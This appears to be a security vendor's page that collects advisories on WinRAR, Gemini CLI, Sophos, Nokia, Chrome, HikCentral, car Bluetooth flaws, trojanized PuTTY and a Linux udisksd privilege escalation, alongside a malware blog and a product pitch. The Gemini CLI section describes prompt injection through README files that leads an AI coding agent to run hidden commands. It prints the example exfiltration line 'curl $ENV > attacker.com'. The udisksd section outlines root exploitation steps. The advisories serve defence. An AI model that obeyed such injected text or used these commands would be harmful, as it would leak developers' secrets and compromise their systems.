CXO

Security Advisory

WinRAR Zero-Day Path Traversal Flaw Actively Exploited to Code Execution 

Security advisory: A zero-day path traversal vulnerability has been discovered in the Windows version of a popular file archiver utility, WinRAR. The vulnerability tracked as CVE-2025-8088, affects multiple Windows-based WinRAR an components, which has already been exploited in the wild.

Severity High 
CVSS Score 8.4 
CVEs CVE-2025-8088 
POC Available Yes 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 
This flaw allows attackers to manipulate the extraction path of files from a malicious archive, enabling them to place arbitrary code file in sensitive system folders, overwrite important files and even execute malicious code immediately upon extraction. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Path Traversal Vulnerability   CVE-2025-8088  WinRAR (Windows versions), RAR, UnRAR, portable UnRAR (Windows), UnRAR.dll 8.4  WinRAR 7.13 

Technical Summary 

When extracting files, vulnerable versions of WinRAR could be tricked into using a maliciously crafted file path embedded inside an archive rather than the user’s intended extraction directory. This occurs when the extraction process fails to properly validate and sanitize file paths before writing them to disk. 
As a result, attackers can: 

  • Place malicious files in protected system directories. 
  • Overwrite critical system/application files. 
  • Trigger automatic execution of malware without further user action. 

Most common attack vector involves sending a malicious archive via phishing or other social engineering techniques. When opened with a vulnerable WinRAR version, the malware is silently deployed and executed. 

Unix versions of RAR, UnRAR, UnRAR library, RAR for Android are not affected for this vulnerability. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-8088 WinRAR and related components on Windows version (RAR, UnRAR, portable UnRAR, UnRAR.dll) Flawed extraction path handling allows files to be placed outside the intended extraction directory. Allows arbitrary file placement, overwriting critical files, and executing malicious code without user interaction. 

Recommendations

Here are the recommendations below you can follow 

  • Update immediately to WinRAR 7.13 or newer version from the official WinRAR website. 
  • Avoid extracting archives from untrusted or unknown sources. 
  • Enable endpoint protection and ensure it scans archives before extraction. 
  • Audit your system for unusual or unauthorized files in system directories. 

Conclusion: 
CVE-2025-8088 shows that even widely trusted tools like WinRAR can become high-risk targets when flaws allow silent malware deployment during normal usage. Given that this zero-day has already been exploited, updating to WinRAR 7.13 immediately is crucial. Additionally, users should avoid extracting files from unknown sources and maintain strong endpoint protection. 

References

Blogs

New Malware Strikes on Users Data, infects Devices has bypass mechanism;

How deadly the malware is warns Researchers. Linux malware variant offers advanced features and evasion mechanisms

PSA stealer malware affected more then 4,000 computers in 62 countries

A brand new malware related to Linux  been found infecting thousands of computers around the world, stealing people’s login credentials, payment information and browser cookies, warns security researchers from SentinelLabs and Beazley Security. More than 4,000 computers were infected with PSA Stealer in 62 countries, the two companies said, suggesting that the campaign is rather successful.

As per researcher PSA Stealer is apparently being distributed through phishing emails and malicious landing pages. The malicious attachments contain a legitimate program (such as a PDF reader) and a weaponized DLL. The program sideloads the DLL, successfully deploying the malware while not raising any alarms.

More than 4,000 computers were infected with PSA Stealer in 62 countries, the two companies said, suggesting that the campaign is rather successful.

The  joint report detailing the activities of PXA Stealer, a new Python-based infostealer for the Linux platform. Spotted in late 2024, and has since grown into a formidable threat, successfully evading defense tools while wreaking havoc across the globe.

Key pointers on installing the applications /malware (Side Loading)

The malware PSA can target browser extensions for various crypto wallets, including Exodus, Magic Eden, Crypto.com and many more

Can pull data from sites such as Coinbase, Kraken, and PayPal.

Finally, it can inject a DLL into running browser instances to bypass encryption mechanisms.

PSA Stealer is apparently being distributed through phishing emails and malicious landing pages

The malicious attachments contain a legitimate program (such as a PDF reader) and a weaponized DLL. 

The program sideloads the DLL, successfully deploying the malware while not raising any alarms.

Hackers who are from Vietnamize origin are selling data selling it on the black market – in a Telegram group. The majority of the victims are located in South Korea, the US, the Netherlands, Hungary, and Austria.

So far, more than 200,000 were stolen passwords, as well as hundreds of credit card information and more than four million cookies.

Vulnerability in SAP NetWeaver recently discovered by threat researchers from from Palo Alto Networks’ Unit 42 is being exploited to deploy Linux malware is capable of running arbitrary system commands and deploying additional payloads, experts have warned.

Security researchers from Palo Alto Networks’ Unit 42 discovered a piece of malware called Auto-Color, a backdoor, from Linux and dubbed for its ability to rename itself after installation.

The researchers found it was capable of opening reverse shells, executing arbitrary system commands, acting as a proxy, uploading and modifying files.

This also include adjusting settings dynamically. It was also discovered that the backdoor remains mostly dormant if its C2 server is unreachable, effectively evading detection by staying inactive until the operator instructions arrive.

Mitigating threat from Malware

Malware is any software intentionally designed to damage, disrupt, or gain unauthorized access to computer systems. In cybersecurity the diversity of malware include viruses, worms, spyware and ransomware. Each has unique attack methods, so it’s essential to understand their nature and behavior to mitigate potential risks.

How does Malware spread & threat Malware pose?

All channels available at disposal should be monitored when we think of malware and how they spread. All types of malware can spread in various ways, using technical vulnerabilities and human inattention to infiltrate systems and networks, but some methods prove more successful than others.  Understanding how malware typically presents itself and spreads can help businesses stay vigilant against its damage.

Deceive & Defend against Malware with Mirage Cloak from IntruceptLabs

Mirage Cloak offers various deception methods to detect and stop threats before they cause damage. These methods include adding decoys to the network, deploying breadcrumbs on current enterprise assets, using baits as tripwires on endpoints, and setting up lures with intentionally misconfigured or vulnerable services or applications. The flexible framework also lets customers add new deception methods as needed.

  • Our AI-powered proactive defense system identifies potential threats in real time, giving you the upper hand in protecting your network and assets.
  • By leveraging advanced artificial intelligence, our system reduces false positives, allowing your security team to focus on genuine threats and respond effectively.
  • With machine learning capabilities, our defense system continuously learns and evolves, adapting to new attack vectors and staying ahead of cyber threats.

Do connect with us for any query: https://intruceptlabs.com/contact/

(Source: Dangerous new Linux malware strikes – thousands of users see passwords, personal info stolen, here’s what we know | TechRadar)

Security Advisory

Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems 

Summary 

Security Advisory :

In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface. 

This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows. 

Vulnerability Details 

Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection. 

A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation. 

To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands. 

Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system. 

Attack Flow 

Step Description 
1. Craft Malicious prompt injections are embedded inside context files like README.md along with benign code. 
2. Deliver Malicious repository is cloned or reviewed by a developer using Gemini CLI. 
3. Trigger Gemini CLI loads and interprets the context files. 
4. Execution Malicious code is executed due to weak validation and implicit trust. 
5. Exfiltrate Environment variables or secrets are silently sent to attacker-controlled servers. 

Proof-of-Concept Snippet 

Source: Tracebit 

Why It’s Effective 

  • Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny. 
  • Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands. 
  • Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools. 

Broader Implications 

Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk. 

Remediation

  • Upgrade Gemini CLI to version 0.1.14 or later. 
  • Enable sandboxing modes where it is possible to isolate and protect systems. 
  • Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards. 
  • Review and monitor command execution prompts carefully 

Conclusion: 
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code. 

Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines. 

References

Security Advisory

Pre-Auth Remote Code Execution Flaws Patched in Sophos Firewall 

Summary : Sophos has resolved several critical security vulnerabilities in its Firewall products, the most severe vulnerability could allow remote code execution without authentication, potentially giving attackers full control over impacted systems.

OEM Sophos 
Severity Critical 
CVSS Score 9.8 
CVEs CVE-2025-6704, CVE-2025-7624 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

To address the issue, the Sophos has issued hotfixes for five separate vulnerabilities. Two of these are rated as critical and present a serious threat to enterprise networks around the globe. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
Arbitrary file writing vulnerability in Secure PDF eXchange (SPX) feature  CVE-2025-6704 Sophos Firewall Critical   SFOS 21.0 MR2 (21.0.2) and later 
SQL injection vulnerability in legacy SMTP proxy CVE-2025-7624 Sophos Firewall Critical SFOS 21.0 MR2 (21.0.2) and later 

Technical Summary 

The CVE-2025-6704 and CVE-2025-7624 are identified in Sophos Firewall versions prior to 21.0 MR2 (21.0.2), both with a CVSS v3.1 base score of 9.8, indicating critical severity.  

The CVE-2025-6704 involves an arbitrary file writing vulnerability within the Secure PDF eXchange (SPX) feature.

SPX is enabled and the firewall operates in High Availability (HA) mode, attackers can exploit this flaw to execute arbitrary code remotely without authentication. This pre-authentication remote code execution can lead to full system compromise, affecting confidentiality, integrity and availability. 

CVE-2025-7624 pertains to an SQL injection vulnerability in the legacy (transparent) SMTP proxy of Sophos Firewall. If a quarantining policy is active for email and the system was upgraded from a version older than 21.0 GA, this weakness could potentially allow remote code execution.

Exploitation of this flaw can lead to unauthorized access, manipulation of firewall configurations, and potential lateral movement within the network. 

CVE ID System Affected  Vulnerability Details Impact 
 CVE-2025-6704 v21.5 GA and older A rare SPX feature flaw in HA mode can allow pre-auth remote code execution, affecting 0.05% of devices.  Pre-auth remote code execution (RCE) in Sophos Firewall SPX feature 
CVE-2025-7624 v21.5 GA and older An SQL injection in the legacy SMTP proxy can enable remote code execution if email quarantine is active and SFOS was upgraded from pre-21.0 GA. It affects up to 0.73% of devices. Remote code execution via SMTP proxy 

In addition to the Critical Severity vulnerabilities, two other High and one medium severity issues were addressed. 

CVE-2025-7382 – Command Injection in WebAdmin Interface (CVSS 8.8) 

A WebAdmin command injection flaw allows adjacent pre-auth code execution on HA auxiliary devices if admin OTP is enabled.  

CVE-2024-13974 – Business Logic Vulnerability in Up2Date Component (CVSS 8.1) 

 A business logic flaw in Up2Date lets attackers control firewall DNS to enable remote code execution. 

CVE-2024-13973 – Post-Auth SQLi Vulnerability in WebAdmin (CVSS 6.8) 

A post-auth SQL injection in WebAdmin allows admins to execute arbitrary code. 

Remediation

Users should immediately update Sophos Firewall to the latest patched version: 

  • For CVE-2025-6704, CVE-2025-7624, CVE-2025-7382: Upgrade to Sophos Firewall 21.0 MR2 (21.0.2) or later. 
  • For CVE-2024-13974 and CVE-2024-13973: Upgrade to Sophos Firewall 21.0 MR1 (20.0.1) or later. 

If you are not using the Secure PDF eXchange (SPX) feature or legacy SMTP proxy, consider disabling them until they are patched. 

Users operating legacy versions prior to the supported range must upgrade their systems to receive these critical security protections and maintain adequate defense against potential exploitation attempts.

Conclusion: 
In Sophos Firewalls that allow attackers to execute code remotely without logging in. Although only a small percentage of devices are affected, the flaws are serious.

Fortunately, Sophos quickly pushed automatic fixes, and no attacks have been seen so far. Users should verify their firewalls are fully updated and have auto update enabled to stay protected. 

The impact scope for this vulnerability reaches up to 0.73% of deployed devices. Both critical vulnerabilities were discovered and responsibly disclosed through Sophos’ bug bounty program by external security researchers.

References

Security Advisory

Critical Remote Code Execution in Nokia WaveSuite NOC 

Summary : Security Advisory: Two command injection vulnerabilities have been found in Nokia’s WaveSuite Network Operations Center (WS-NOC), a key tool used to manage telecom and enterprise networks.

OEM Nokia 
Severity Critical 
CVSS Score 9.0 
CVEs CVE-2025-24936, CVE-2025-24938   
POC Available No 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

These vulnerabilities allow attackers with limited access to run malicious commands on the system’s operating system. The vulnerabilities affect WS-NOC versions 23.6, 23.12, and 24.6. Nokia has released fixes in version 24.6 FP3 and newer. 

Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​ Command Injection Vulnerability  CVE-2025-24936 Nokia WS-NOC  Critical  v24.6 FP3 & later 
​ Command Injection Vulnerability  CVE-2025-24938 Nokia WS-NOC  High  v24.6 FP3 & later 

Technical Summary 

The first vulnerability, CVE-2025-24936, CVSS- 9.0 due to the system doesn’t properly check parts of a web address (URL). The attacker with low privileged access can trick the system into running malicious commands, as if they were part of the system itself. As this flaw has been published, attackers can remotely target exposed or inadequately secured administrative pages. 

The second issue, with the CVE-2025-24938, CVSS- 8.4 affects to new user accounts are created through the web interface. In this case, with high privileged access – administrators can intentionally enter harmful commands because their input isn’t being filtered properly. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025- 24936 WS-NOC 23.6, 23.12, 24.6 Unfiltered URL input enables command injection by low-privileged users. Remote code execution 
CVE-2025- 24938 WS-NOC 23.6, 23.12, 24.6 Insufficient input validation during account creation enables command injection. Privilege escalation, Remote code execution 

Remediation

  • Immediate Action: Upgrade WS-NOC to version 24.6 FP3 or latest one to mitigate both vulnerabilities. 

Recommendations: 

  • Configuration Check: Restrict admin panel and WS-NOC access to trusted, internal networks only. 
  • Environment Hardening: Regularly audit user privileges, conduct input validation reviews, and deploy security monitoring for unusual command executions originating from the WS-NOC application. 

Conclusion: 

CVE-2025-24936 and CVE-2025-24938 are critical command injection vulnerabilities in Nokia WaveSuite NOC, which is used in telecom systems around the world. These vulnerabilities allow attackers to execute malicious commands with limited access. As these systems are part of critical infrastructure, prompt patching is essential to prevent potential remote attacks and network disruption. 

References

Security Advisory

Google Addresses Actively Exploited Zero-Day Vulnerability CVE-2025-6558 in Chrome 

Google has issued a critical emergency update for the Chrome browser to address CVE-2025-6558, a zero-day vulnerability that is actively being exploited in the wild. This high-severity flaw exists in Chrome’s ANGLE and GPU components, which are responsible for rendering graphics in the browser.

Summary 

OEM Google 
Severity High 
CVSS Score 8.8 
CVEs CVE-2025-6558 
POC Available No 
Actively Exploited Yes 
Exploited in Wild Yes 
Advisory Version 1.0 

Overview 

Exploitation of this vulnerability could allow attackers to execute malicious code or gain unauthorized access to user systems. The update is being rolled out for Windows, macOS and Linux platforms. 

                Vulnerability Name CVE ID Product Affected Severity Fixed Version 
​Improper Input Validation in ANGLE/GPU Stack vulnerability  CVE-2025-6558 Google Chrome  High (Zero-day)  138.0.7204.157/.158 (Windows/macOS), 138.0.7204.157 (Linux) 

Technical Summary 

CVE-2025-6558 is a high-severity vulnerability caused by improper validation of untrusted input in Chrome’s ANGLE (Almost Native Graphics Layer Engine) and GPU components. These components translate graphics instructions and interact closely with the system’s native APIs.

The flaw was discovered by Google’s Threat Analysis Group (TAG) and is being actively exploited in real-world attacks. If left unpatched, it could enable attackers to compromise the browser rendering process and potentially execute arbitrary code on the user’s device. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-6558 Chrome on Windows, macOS, Linux Untrusted input is incorrectly validated, allowing malicious manipulation of graphics rendering Remote code execution through active exploitation 

Additional Vulnerabilities Patched in This Update 

In addition to the zero-day CVE-2025-6558, Google also addressed two other high-severity vulnerabilities as part of this update: 

  • CVE-2025-7656 – An integer overflow vulnerability in Chrome’s V8 JavaScript engine, which could be exploited to corrupt memory and potentially achieve remote code execution. This flaw was reported by security researcher Shaheen Fazim.  
  • CVE-2025-7657 – A use-after-free vulnerability in the WebRTC (Web Real-Time Communication) component. Improper memory handling in real-time communication features could allow attackers to crash the browser or execute arbitrary code remotely. This issue was reported by researcher jakebiles. 

Remediation

  • Users should immediately update Google Chrome to the latest patched version: 
  • Windows & Mac: 138.0.7204.157/.158 
  • Linux: 138.0.7204.157 

Conclusion: 
CVE-2025-6558 highlights the growing complexity of securing browser components such as ANGLE and GPU. With confirmed active exploitation, users and administrators must prioritize this update to prevent potential remote code execution attacks.

Timely patching remains one of the most effective defenses against modern browser-based threats. 

References

Security Advisory

CVE-2025-34067: Critical RCE in HikCentral Puts Global Surveillance at Risk, PoC Available 

Summary:  A critical RCE vulnerability has been found in the Hikvision HikCentral security management system, mainly in the apply CT component.

OEM Hikvision 
Severity Critical 
CVSS Score 10.0 
CVEs CVE-2025-34067 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

It helps attackers to take full control of servers that manage security cameras and building systems without user interaction and authentication. The issue comes from a weakness in an old part of the software – Fastjson, a Java library.

Hackers can use this flaw to run harmful code remotely over the network. A PoC to exploit this vulnerability has been published already. 

Vulnerability Name CVE ID Product Affected Severity 
​ Remote Code Execution Vulnerability CVE-2025-34067 HikCentral (applyCT) Critical 

Technical Summary 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-34067 HikCentral  The /bic/ssoService/v1/applyCT endpoint is vulnerable due to the use of an outdated Fastjson library with unsafe auto-type deserialization enabled. Attackers can send malicious JSON payloads containing LDAP references to attacker-controlled Java classes. Remote code execution  

A security flaw exists in the “/bic/ssoService/v1/applyCT” endpoint, which accepts JSON input. This allows attackers to send specially designed data that tricks the system into loading malicious code from an attacker-controlled server.

Since the system processes this data before checking if the user is logged in, even someone without any login credentials can exploit it. If successful, the attacker can run harmful code under the HikCentral service’s permissions. This helped them move through the network, access or control camera feeds, DVRs/NVRs, and other connected systems across the enterprise.Proof of Concept (PoC): 

(Source: PeiQi0 )

Remediation

  • Apply Patches: Users should contact HIKVISION support for immediate remediation guidance and apply any security updates or hotfixes provided by the vendor. 
  • Update Fastjson Library: Ensure the Fastjson library is updated to a secure patched version. 

Recommendations: 

  • Configuration Check: If patching isn’t possible, block or redirect all traffic to the “/bic/ssoService/” endpoints – especially on systems that are accessible from the internet. 
  • Network Segmentation: Isolate surveillance and physical security networks from business-critical systems. 
  • Monitoring: Check logs for outbound LDAP traffic, suspicious Java class loads, or unexpected command execution from the HikCentral host. 

Conclusion: 
This vulnerability helps attackers to take full control of the system, Publicly available code makes it easy for attackers to exploit this flaw. Because of the critical risk, it has received the maximum severity score (CVSS 10.0).  

If not fixed, attackers could turn off security cameras, change alarm settings, delete important evidence, and even watch staff movements live. To protect against this threat, it’s urgent to install the latest patch, isolate the system from the internet and closely monitor for suspicious activity. 

References

Security Advisory

Mercedes, VW, Skoda Cars at Risk from Critical PerfektBlue Bluetooth Vulnerabilities 

Summary 

Severity High 
CVSS Score 8.0 
CVEs CVE-2024-45431, CVE-2024-45432, CVE-2024-45433, CVE-2024-45434, 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 
Researchers discovered critical Bluetooth flaws, called PerfektBlue, in the OpenSynergy BlueSDK stack used in millions of vehicles. These allow attackers nearby to remotely run malicious code through the infotainment system, potentially accessing GPS, audio and even vehicle controls depending on the car’s design.

Cars from brands like Mercedes-Benz, Volkswagen and Skoda are affected. While patches were released, it is urged to update the systems and stay cautious during Bluetooth pairing to stay protected. 

Vulnerability Name CVE ID Product Affected Severity 
Use-After-Free in AVRCP  CVE-2024-45434 Open Synergy BlueSDK (Bluetooth AVRCP service_ 8.0   
RFCOMM Improper Function Termination CVE-2024-45433 OpenSynergy BlueSDK (Bluetooth RFCOMM protocol) 5.7 
RFCOMM Parameter Misuse CVE-2024-45432 OpenSynergy BlueSDK (Bluetooth RFCOMM protocol) 5.7 
L2CAP Remote CID Validation Flaw CVE-2024-45431 OpenSynergy BlueSDK (Bluetooth L2CAP layer)  3.5 

Technical Summary 

A set of vulnerabilities has been identified in the Bluetooth stack of infotainment systems, affecting core protocols like AVRCP, L2CAP, and RFCOMM. These issues stem from improper memory handling, incorrect parameter usage and flawed validation logic. While some may only cause system instability or crashes, they can be combined in a coordinated attack to bypass defenses, disrupt communication or potentially execute code remotely. Overall, they expose critical weaknesses that could be exploited to compromise the system through crafted Bluetooth traffic. 

CVE ID System Affected  Vulnerability Details Impact 
CVE-2024-45434 Vehicles using Open Synergy Blue SDK, including Mercedes-Benz, Volkswagen, Skoda and undisclosed OEM. This vulnerability allows attackers to exploit free memory in the AVRCP service. By sending crafted Bluetooth commands, they can trigger a use-after-free condition, potentially leading to crashes or remote code execution inside the infotainment system. It can be part of a larger attack chain to take over the system. May allow attackers to run remote code on the infotainment system. 
CVE-2024-45433 Automotive systems running Blue SDK’s RFCOMM protocol implementation.  Due to faulty logic in RFCOMM, certain functions may not exist properly. This can cause the system to behave unpredictably, giving attackers a chance to manipulate control flow or trigger crashes. It can be used to stabilize or advance remote attacks on the Bluetooth stack.  May cause system crash or help in running further malicious actions. 
CVE-2024-45432 Vehicles using Open Synergy Blue SDK with Bluetooth RFCOMM services.  This issue involves functions in the RFCOMM protocol being called with wrong parameters. Attackers can exploit this to introduce unexpected behavior or weaken Bluetooth processing. On its own, it may cause a crash, but as part of an exploit chain, it helps attackers gain deeper access. Can create logic errors and make the system unstable. 
CVE-2024-45431 Infotainment systems in vehicles using Open Synergy Blue SDK Bluetooth stack. This flaw stems from incorrect validation of channel IDs in the L2CAP layer. Attackers can send malformed Bluetooth packets that bypass checks, possibly disrupting communication or preparing the system for further exploitation. Though low in severity alone, it can support chained attacks. Could help attackers bypass checks 

Remediation

To stay protected from the PerfektBlue vulnerabilities, users should update with the available latest patches provided by the manufacturer ensure once their vehicle’s software is fully updated.  

Here are some best practices below you can follow  

  • Disable Bluetooth when not in use and avoiding unnecessary pairing, especially in public areas, can reduce exposure to potential attacks.  
  • Always verify Bluetooth pairing requests and codes carefully before accepting any connection.  

Conclusion: 
The PerfektBlue flaws show that even car Bluetooth systems can be a way for hackers to attack. If not fixed, these issues can let attackers take control of your car’s infotainment features and maybe more. Timely patching and adopting secure Bluetooth practices are essential to minimize exposure. As vehicles grow increasingly connected, securing their wireless interfaces becomes crucial to maintaining overall system safety and privacy. 

References

Security Advisory

SEO Poisoning Campaign Targets IT Admins with Weaponized PuTTY & WinSCP 

SEO poisoning & malvertising campaign Summary 

A sophisticated SEO poisoning and malvertising campaign has been active since early June 2025, targeting IT administrators with Trojanized installers of commonly used tools like PuTTY and WinSCP. 

Attackers are manipulating search engine results and sponsored ads to lead users to fake websites, which deliver backdoored versions of these tools. Arctic Wolf security researchers have uncovered thia malvertising campaign that has been targeting IT professionals since early June 2025.

The malicious campaign leverages search engine manipulation to promote fake download sites that closely mimic legitimate software repositories. 

Technical Summary 

A threat campaign has been leveraging SEO poisoning and malicious advertisements to trick IT professionals into downloading Trojanized versions of PuTTY and WinSCP from fake websites. Once installed, a malware known as Oyster (aka Broomstick) creates persistent access within the victim’s environment, posing a severe risk to enterprise infrastructure. 

This malware establishes persistence by creating a scheduled task that triggers every three minutes, invoking rundll32.exe to execute a malicious DLL named twain_96.dll using the DllRegisterServer export function, a technique commonly used to bypass traditional detection.  

The attackers specifically target IT administrators and system operators due to their elevated privileges, which allows rapid lateral movement, access to sensitive systems such as domain controllers and the potential deployment of additional payloads like ransomware.

The campaign’s effectiveness stems from its exploitation of everyday workflows, especially IT admins’ reliance on search engines to download tools making it both highly targeted and socially engineered for success. 

Element Detail 
Initial Access SEO poisoning and fake sponsored ads redirect users to malicious download sites. 
Malicious Tools Trojanized installers of PuTTY and WinSCP. 
Payload Backdoor malware is known as Oyster/Broomstick. 
Persistence Scheduled Task every 3 minutes executing twain_96.dll using rundll32.exe via DllRegisterServer. 
Target IT admins with elevated privileges (Domain Admins, Server Admins). 
Objective Network penetration, domain controller access, data exfiltration, possible ransomware deployment. 

Malicious Sponsored PuTTY Ad on Bing.       Source: Arcticwolf 

Observed Malicious Domains 

Organizations are urged to block the following domains immediately: 

  • updaterputty[.]com 
  • zephyrhype[.]com 
  • putty[.]run 
  • putty[.]bet 
  • puttyy[.]org 

These domains host fake versions of PuTTY and WinSCP and are actively used in the ongoing campaign. 

Remediation

1. Enforce Trusted Software Acquisition Policies 

  • Mandate the use of verified internal software repositories or direct access to official vendor websites. 
  • Where feasible, implement ad-blocking or web filtering to restrict access to software download categories known to be targeted by malvertising. 

2. Strengthen Network and Endpoint Security Controls 

  • Block known malicious domains at firewall and DNS levels. 
  • Continuously monitor endpoints for suspicious behavior, including: 
  • The creation of unauthorized or high frequency scheduled tasks. 
  • DLL execution via rundll32.exe, especially involving non-standard DLLs such as twain_96.dll. 
  • Deploy or enhance EDR/XDR solutions to detect backdoor persistence methods. 

3. User Awareness 

  • Educate IT staff on SEO poisoning and the risks of downloading tools via search results. 

Conclusion: 
By focusing on widely used administrative tools like PuTTY and WinSCP, threat actors are exploiting the trust and habits of IT professionals through convincing social engineering and poisoned search results.

This approach turns essential tools into delivery mechanisms for backdoors and persistent threats, compromising high-privilege users at the core of enterprise infrastructure.  

Organizations must respond decisively by reinforcing endpoint monitoring, tightening software acquisition policies and implementing robust network-level defenses to mitigate the risks posed by this rapidly evolving threat landscape. 

References

Security Advisory

Linux Local Privilege Escalation via udisksd and libblockdev (CVE-2025-6019) PoC released 

Summary : A local privilege escalation vulnerability poc has been released, tracked as CVE-2025-6019, discovered in the udisksd daemon and its backend libblockdev library, affecting widely used Linux distributions including Fedora and SUSE.

Severity High 
CVSS Score 7.0 
CVEs CVE-2025-6019 
POC Available Yes 
Actively Exploited No 
Exploited in Wild No 
Advisory Version 1.0 

Overview 

CVE-2025-6019 is a local privilege escalation (LPE) vulnerability affecting systems where: 

  • udisksd is installed and running (e.g., Fedora, SUSE) 
  • Users in the allow active group are trusted to execute disk-related actions 
  • libblockdev fails to validate privileged backend operations under unprivileged contexts 

This flaw allows unprivileged users in the “allow_active” group to escalate privileges and execute commands as root by exploiting insecure trust boundaries in D-Bus IPC communication. 

Vulnerability Name CVE ID Product Affected Severity 
​Local Privilege Escalation Vulnerability  CVE-2025-6019 udisksd / libblockdev  High 

Technical Summary 

This vulnerability is triggered when an attacker in the “allow_active” group issues a crafted D-Bus request to the udisksd daemon using tools like udisksctl. Because the daemon improperly relies on group membership alone (without UID validation), it mistakenly grants root-level mount permissions. 

An attacker can exploit this by  

  • Crafting a malicious disk image (like XFS with a SUID-root shell). 
  • Using “udisksctl mount -b /dev/loop0” to mount it as root. 
  • Escalating privileges and compromising the system. 
CVE ID System Affected  Vulnerability Details Impact 
CVE-2025-6019 Fedora, SUSE, and other Linux distros using udisks2/libblockdev Improper user validation in D-Bus authorization allows unprivileged users to perform privileged disk operations.  Local privilege escalation to root 

Remediation

Here are the recommendations below 

  • Update “udisks2” and “libblockdev” to the latest versions provided by your distribution. 
  • Audit and restrict membership of the “allow_active” group. 
  • Disable unsafe or legacy D-Bus actions in system services where possible. 

Conclusion: 
CVE-2025-6019 highlights a breakdown in privilege boundary enforcement within a core system component used by many Linux desktop environments.

The availability of a public PoC, combined with the low complexity of exploitation, makes this vulnerability highly dangerous, particularly in multi-user or shared computing environments. 

Organizations must act swiftly to patch vulnerable systems, reassess group-based privilege models and implement stricter D-Bus and Polkit rules to reduce attack surface. 

References

Scroll to top